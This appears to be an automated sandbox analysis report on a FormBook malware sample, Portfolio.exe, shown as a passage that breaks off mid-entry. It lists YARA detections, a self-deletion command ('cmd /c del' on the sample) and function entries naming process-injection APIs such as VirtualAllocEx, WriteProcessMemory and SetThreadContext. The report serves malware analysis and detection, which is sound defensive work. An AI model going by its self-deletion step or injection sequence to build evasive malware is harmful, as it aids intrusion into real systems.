Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0xc70000
File size:	3444224 bytes
MD5 hash:	2412003BE253A515C620CE4890F3D8F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6216 Parent PID: 1320

General

Start time:	09:17:37
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Portfolio.exe'
Imagebase:	0x30000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6236 Parent PID: 6216

General

Start time:	09:17:37
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Portfolio.exe PID: 5880 Parent PID: 5592 Portfolio.exeCOMMON

Executed Functions

Function 01AD0006, Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

vL10, xrefs: 01AD012B
!E, xrefs: 01AD0213

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID: !E$vL10
API String ID: 0-2976627198
Opcode ID: dce7fd4b5704c5462e7ea00877f44ef84336d8cf9a537e21a976152173ac7ff8
Instruction ID: b1c5afae260b66073dce3b2e26ca33c808b4e326e37cb0a4c9d1305d0b35de67
Opcode Fuzzy Hash: dce7fd4b5704c5462e7ea00877f44ef84336d8cf9a537e21a976152173ac7ff8
Instruction Fuzzy Hash: F7B169B4E096598FCB04CFA9CA405DEFFF2BF89310F18816AE406AB259D7349941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 01AD0040, Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

vL10, xrefs: 01AD012B
!E, xrefs: 01AD0213

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID: !E$vL10
API String ID: 0-2976627198
Opcode ID: 24226341b6c679c94844cedd90e8f106017570368e390dcb1c3b17a1bfc51b34
Instruction ID: bc1602c8a1de5936193c0073b9a805487c247cce464519fdb051a55edfef0cef
Opcode Fuzzy Hash: 24226341b6c679c94844cedd90e8f106017570368e390dcb1c3b17a1bfc51b34
Instruction Fuzzy Hash: 6EB128B4E05619DFCB04DFE9CA8099EFBF2BF88310F14C129E516AB359D7349A418B64

Uniqueness

Uniqueness Score: -1.00%

Function 01AD38A0, Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

Zt^, xrefs: 01AD4AB1

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID: Zt^
API String ID: 0-1331977847
Opcode ID: 42dbc67a464ff42facfc0f6624ba7e236af89a8ce55274f5c5acfbd98dbad5cf
Instruction ID: bba8fd0506a609f927d88dc5acbb76c84e3456d5773b961ed0ea08ffab69d232
Opcode Fuzzy Hash: 42dbc67a464ff42facfc0f6624ba7e236af89a8ce55274f5c5acfbd98dbad5cf
Instruction Fuzzy Hash: 21815BB5E04629CBDB64CF66C8447D9F7B2FF88300F14C1AAD40AA7214E7745A85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01AD0538, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa58167b5e643c9ddcd81714d17a6f22a5ce662c3e3d57ef4f2d27032f90b6a
Instruction ID: 8e35bfd24e11275a0c80839fd342fb41eddec7980a0e217e04308fd7eea4cf17
Opcode Fuzzy Hash: caa58167b5e643c9ddcd81714d17a6f22a5ce662c3e3d57ef4f2d27032f90b6a
Instruction Fuzzy Hash: 22516975E0564ACFCB04CFAAC640AEEFFF2EB89310F14D026E915A7255D7349A418FA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD0548, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0851cfd07f21852302317ccea9f5365334319849f476c558a678af7c803d53
Instruction ID: 3f76734136370451a2f864887b3e6d3b7fa0590464b107e9ce26dd2d879c852b
Opcode Fuzzy Hash: 6f0851cfd07f21852302317ccea9f5365334319849f476c558a678af7c803d53
Instruction Fuzzy Hash: 7A516A74E0560ACFCB04CFAAC640AEEFBF2EB89310F14D025E916A7214D73499418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 01AD60B0, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32de43a381bcb7809c992120b95e009a019eab561bfd892177e53cbab428497
Instruction ID: efd3cdb9857bce6207b8fd731955f7e85f377c97f056c0e69c49404e2390339a
Opcode Fuzzy Hash: f32de43a381bcb7809c992120b95e009a019eab561bfd892177e53cbab428497
Instruction Fuzzy Hash: 64312270D05628DFDB14DFB9D848BEDBBF1AB0A311F14902AE40AB3292C7749945CF24

Uniqueness

Uniqueness Score: -1.00%

Function 01AD60A2, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118332e50129bdf75472924b25eb38ebdbccfae1f90027ab13778c19bcfc451b
Instruction ID: f6efc6c868eb1237018e62486e41fcd5d132d505f72c5cda43835b94e9ca8806
Opcode Fuzzy Hash: 118332e50129bdf75472924b25eb38ebdbccfae1f90027ab13778c19bcfc451b
Instruction Fuzzy Hash: 8F315570D45728DFDB14CFB4D888BEDBBB0AB0A311F18802AE40AB3292C7748945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 019E6B90, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 019E6C00
GetCurrentThread.KERNEL32 ref: 019E6C3D
GetCurrentProcess.KERNEL32 ref: 019E6C7A
GetCurrentThreadId.KERNEL32 ref: 019E6CD3

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a46d920e3ecef9a1752e482d2bd274aaba1a70a860d569ebbe26a880107f9d67
Instruction ID: fa1071793d63f814a0144d748ed1a2149f5b7ef5a6d12b6c3cfe7ddc52cf5186
Opcode Fuzzy Hash: a46d920e3ecef9a1752e482d2bd274aaba1a70a860d569ebbe26a880107f9d67
Instruction Fuzzy Hash: FA5155B4E042488FDB14DFAAC648B9EBBF4EF49308F14805AE659A7390D7345984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 019E6BA0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 019E6C00
GetCurrentThread.KERNEL32 ref: 019E6C3D
GetCurrentProcess.KERNEL32 ref: 019E6C7A
GetCurrentThreadId.KERNEL32 ref: 019E6CD3

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0930e2877cd9c7d09304ff63d546d9cfdbb80321b348e1a7f1fa8c22337e613b
Instruction ID: ff338516f2ab748d10d783da7750d93a8bcd040a73fc4286d6b202bd47091091
Opcode Fuzzy Hash: 0930e2877cd9c7d09304ff63d546d9cfdbb80321b348e1a7f1fa8c22337e613b
Instruction Fuzzy Hash: 805154B4E002098FDB14DFAAC64879EBBF4EF49318F20805DE259A7350D734A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01AD236C, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01AD25A6

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bcbc898a960498d4b7736245d8afc2481be981e8baedac197b040a3682e99dc5
Instruction ID: ada9bc50ccedc7a936a4993bb484c34027551722659cb64e73024b138685f6a3
Opcode Fuzzy Hash: bcbc898a960498d4b7736245d8afc2481be981e8baedac197b040a3682e99dc5
Instruction Fuzzy Hash: 23915AB1D047198FDB20CFA9C8417EEBAB2FF48314F05856AD81AA7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01AD2370, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01AD25A6

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7ed05e34f6ea8f1941a4d5b94dd780ad0963db4d074e226aed7814102a30fed5
Instruction ID: eeed6239d493926fad4793b88c8ef6f0d4e9a3eb33d5d8a71090595ca4fe2e6e
Opcode Fuzzy Hash: 7ed05e34f6ea8f1941a4d5b94dd780ad0963db4d074e226aed7814102a30fed5
Instruction Fuzzy Hash: D8915BB1D047198FDB10CFA9C8417EEBAB2FF48314F05856AD85AA7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 019EBBB8, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 019EBE0E

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5416e85b7f63e5131aafbf06a394ad45ae1981b975d4e1a4b4542a476a10e48c
Instruction ID: 79cad2b3ae8ced39390a5c7bed81d5cca02a8c2248059acd98db37e903a2bb6c
Opcode Fuzzy Hash: 5416e85b7f63e5131aafbf06a394ad45ae1981b975d4e1a4b4542a476a10e48c
Instruction Fuzzy Hash: BF714370A04B058FD725DF6AC54479ABBF5FF88204F008A2DD59ADBB40DB35E84A8F91

Uniqueness

Uniqueness Score: -1.00%

Function 019EDC6D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 019EDD8A

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9979d8c905acc87fa4bcf452ae62cbd59bdeb4e7f9206926101417c8396fdb60
Instruction ID: 988121696548029995d1b481d87a85e9ebaed039aa9ff583142180df273d31ef
Opcode Fuzzy Hash: 9979d8c905acc87fa4bcf452ae62cbd59bdeb4e7f9206926101417c8396fdb60
Instruction Fuzzy Hash: 3C51CFB1D00308AFDB15CF99C984ADEBFF5BF48310F24812AE819AB210D7759985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 019EDC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 019EDD8A

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5646638f67db8ee722c513c8b1e89838feb383cbf04c12e5705b57e1057c9daa
Instruction ID: d930eba17e9e1f81ebce63ce776080128863e18e1936ce590dc91e76dbf05224
Opcode Fuzzy Hash: 5646638f67db8ee722c513c8b1e89838feb383cbf04c12e5705b57e1057c9daa
Instruction Fuzzy Hash: 8A41CFB1D00309AFDF15CF99C984ADEBBF5BF48314F24812AE819AB210D7759985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 019E6D51, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019E6E4F

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1127e6ab2de8b913510d201e92f1a019876083f2209e1d4304a12b0e838795a7
Instruction ID: 0c43cfc17fd0d1afd7b9c30aa6d253b0bb5438bcdc94d18876aa9b0a63f0de92
Opcode Fuzzy Hash: 1127e6ab2de8b913510d201e92f1a019876083f2209e1d4304a12b0e838795a7
Instruction Fuzzy Hash: 2C41697A900248AFCB01CF99D944ADEBFF9FB89310F04805AEA58A7351D735A954DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 059E1E9C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 059E3F49

Memory Dump Source

Source File: 00000000.00000002.254433204.00000000059E0000.00000040.00000001.sdmp, Offset: 059E0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8aff0e6462fb103074d8bb022d80216be85f639c906a038fa0f85ff90e3989ae
Instruction ID: 85178829b364522b6b5bbe705df44d890cd55441818913b112a2052356e25ee2
Opcode Fuzzy Hash: 8aff0e6462fb103074d8bb022d80216be85f639c906a038fa0f85ff90e3989ae
Instruction Fuzzy Hash: 4B411271C0871CCFDB20CFA9C884B9EBBB5BF49304F20846AD508AB251DB746949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 059E0CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 059E0D91

Memory Dump Source

Source File: 00000000.00000002.254433204.00000000059E0000.00000040.00000001.sdmp, Offset: 059E0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 799bfb6e2da217a0e02dbd2180444b0d1640ee6ceea138f8ef53fe5f2d0c4abe
Instruction ID: 55bad56dcacf49f7744a9a0b2b9cd82823fb0167b7b0309bdf5396c6762884a1
Opcode Fuzzy Hash: 799bfb6e2da217a0e02dbd2180444b0d1640ee6ceea138f8ef53fe5f2d0c4abe
Instruction Fuzzy Hash: C0411AB89003058FCB14CF99C448AAABBF5FB89314F15C45DE559AB321D774A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01AD20E0, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01AD2178

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f1830eb09080f6351b027d20bce67aeb97cc95fa670d3f0da019e64e4301d39
Instruction ID: 2ac3a441a6b0e027011f99c43e8e961c22915f01168b07b6524a7df0fd4ee333
Opcode Fuzzy Hash: 2f1830eb09080f6351b027d20bce67aeb97cc95fa670d3f0da019e64e4301d39
Instruction Fuzzy Hash: B0215A719043499FCF00CFA9C9847EEBBF5FF48324F00852AEA59A7250D7789955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD20E8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01AD2178

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1d616849b6dbd75d2ab331059e174e090174b0ec23c76c79f85718fe8c639fb4
Instruction ID: aa48d4506f315e4b87ad3845c1168f3fb97801e32b88d1de94b7176d982a7157
Opcode Fuzzy Hash: 1d616849b6dbd75d2ab331059e174e090174b0ec23c76c79f85718fe8c639fb4
Instruction Fuzzy Hash: 712139759043499FCF00CFA9C9847DEBBF5FF48314F00842AEA19A7240D7789955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019E6DC0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019E6E4F

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 950400009a2ac3274a3c0d7ad637329b68f1c9865d484cb2db45c6c8e4fc6b1c
Instruction ID: 31a7447be9cd484d180405a3e18b86e641212c177eff39381cd2c94299a91f49
Opcode Fuzzy Hash: 950400009a2ac3274a3c0d7ad637329b68f1c9865d484cb2db45c6c8e4fc6b1c
Instruction Fuzzy Hash: 1C21E5B59002089FDB10CF99D584ADEFBF8EB48324F14841AE958A7351D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD21D6, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AD2258

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 426dbb0796c52da14bcc65aa64bbee454600405a27e639f5b52ea114b69e4fbb
Instruction ID: 29eb42b6846e14010338e82406ec1421a7acfd23f26628669b732bbb73295eb2
Opcode Fuzzy Hash: 426dbb0796c52da14bcc65aa64bbee454600405a27e639f5b52ea114b69e4fbb
Instruction Fuzzy Hash: 202116B19042499FCB00CFA9C984BEEBBF5FF48324F10842AE959A7240D7389945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD21D8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AD2258

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 75afe2c21b12f8f05a897681e6ea6480c02222819dcbb055cdfe101b3993fb11
Instruction ID: 52d0c368ecd532150c4d01dae5d5c48f0cc6d8d813d3a41c135108768c87a4b4
Opcode Fuzzy Hash: 75afe2c21b12f8f05a897681e6ea6480c02222819dcbb055cdfe101b3993fb11
Instruction Fuzzy Hash: 132116B19042499FCB00CFA9C984BEEBBF5FF48324F10842AE919A7240D7389945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD1F48, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 01AD1FCE

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 699a7877ee05f07ef5ec6670a9080b7f68405e7d76d7183f13aeab6f3559b9ee
Instruction ID: 0b2dd94934ff67284f21634676cc0975afae6247ac2309578a421c8d3fcb73c9
Opcode Fuzzy Hash: 699a7877ee05f07ef5ec6670a9080b7f68405e7d76d7183f13aeab6f3559b9ee
Instruction Fuzzy Hash: EC2168B1D042088FDB10CFA9C5847EEBBF4AF48314F04842ED559A7240DB789A45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD1F50, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 01AD1FCE

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: d62ea6a4ba7d4dd05e7acfe088537b557606cd89d0fab61186199974289cd2cc
Instruction ID: 6967d90ecd808fb92ed06578d5913b9f22c28dce2998e0812593ed119fcbdff4
Opcode Fuzzy Hash: d62ea6a4ba7d4dd05e7acfe088537b557606cd89d0fab61186199974289cd2cc
Instruction Fuzzy Hash: 192168719043088FDB10CFAAC5847EEBBF4EF48324F00842ED519A7240DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019E6DC8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019E6E4F

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a5d839bb00be924ee4e73c3a12d9879dd19408af8caba1995450c567d66601ae
Instruction ID: 7a96fa94aa8235ae801eb6c40c2d5822be2fa04eff549d3eda1a206317ed5798
Opcode Fuzzy Hash: a5d839bb00be924ee4e73c3a12d9879dd19408af8caba1995450c567d66601ae
Instruction Fuzzy Hash: 3921E4B59002089FDB10CF99D584ADEFBF8EB48324F14841AE958A3350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EB0B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019EBE89,00000800,00000000,00000000), ref: 019EC09A

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: beeec5878f4a2fd25c9ff027da3bfc915f2d31efe1a16b0de70e27a5e756d737
Instruction ID: d22ec4e0ca90d3af18b718eac83c6ba517777c6350a083104107312de17a4c45
Opcode Fuzzy Hash: beeec5878f4a2fd25c9ff027da3bfc915f2d31efe1a16b0de70e27a5e756d737
Instruction Fuzzy Hash: DC1106B29043099FDB10CF9AC548B9EFBF8AB49354F00841EE959A7200C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 019EC028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019EBE89,00000800,00000000,00000000), ref: 019EC09A

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 333c7f6fe06e4baa305a05a0cad6237e6dec3beb31bb5c57a147fffd16dc60e1
Instruction ID: 0b74fb8024128cc02ce02d5847294cd88eb67408bb74889ed10270419a387b1c
Opcode Fuzzy Hash: 333c7f6fe06e4baa305a05a0cad6237e6dec3beb31bb5c57a147fffd16dc60e1
Instruction Fuzzy Hash: BC2117B1D002098FDB10CFA9C584BDEFBF4EB89314F14851ED559A7200C779A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD2026, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01AD2096

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5c49a9d1971d8b8e2a6ad33dd6c6e469f068b9459dd29cf087c4fa0b9db51412
Instruction ID: 90d3e2f60678c04fc5b3247edc3fdd5964980221bb3fa90a629779f9a913e06e
Opcode Fuzzy Hash: 5c49a9d1971d8b8e2a6ad33dd6c6e469f068b9459dd29cf087c4fa0b9db51412
Instruction Fuzzy Hash: 741167719042089FCF10DFA9C9447EFBFF5AF48324F14881AE516A7250C735A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD2028, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01AD2096

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2eea5e5712fb8dc96ff42d3b89a658541dd9df59c4dbe8a878aa8e21e290071d
Instruction ID: 21ffe289d590429924786e4577b843e04c2a891ba9e5d196ebf34ddbf35ee756
Opcode Fuzzy Hash: 2eea5e5712fb8dc96ff42d3b89a658541dd9df59c4dbe8a878aa8e21e290071d
Instruction Fuzzy Hash: CC1167719042089FCF10DFA9C9447DFBBF5AF48324F14881AE516A7250C735A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD1E98, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 01AD1F02

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 05761dc5c00b554bf61ea6c0677c3042b9d71cc8b6707e24f421db70071fbe6c
Instruction ID: 94bc78a92c741b67e9a0edfd7fefe7a359461b1358a5e76331dfffbe3befc110
Opcode Fuzzy Hash: 05761dc5c00b554bf61ea6c0677c3042b9d71cc8b6707e24f421db70071fbe6c
Instruction Fuzzy Hash: F21158B1D042488FDB10DFAAC5447EEFBF4AB88324F14881AD559A7240DB38A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD5128, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 01AD518D

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: acdaef6ef5dc8baef3c04a783a3f3c08ca32a641718b9365ff6906a8b10a3207
Instruction ID: b34ee0594474eaafc11cdedf206a6ef22a23e573c91a4ee15f20dd5402724aec
Opcode Fuzzy Hash: acdaef6ef5dc8baef3c04a783a3f3c08ca32a641718b9365ff6906a8b10a3207
Instruction Fuzzy Hash: A71106B58003499FDB10DF99D985BDEFFF8EB48324F10841AE959A7640D374A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD1EA0, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 01AD1F02

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

